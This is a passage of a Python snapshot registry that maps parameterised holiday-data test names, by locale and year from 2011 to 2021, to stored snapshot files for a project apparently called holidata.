snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fi_FI-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fi_FI-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_BE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_BE-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_CA-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_CA-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[fr_FR-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[fr_FR-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[hr_HR-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hr_HR-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[is_IS-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[is_IS-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[it_IT-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[it_IT-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nb_NO-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nb_NO-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_BE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_BE-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[nl_NL-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[nl_NL-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pl_PL-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pl_PL-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[pt_PT-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[pt_PT-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[ru_RU-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[ru_RU-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sk_SK-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sk_SK-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2020] 1.py')
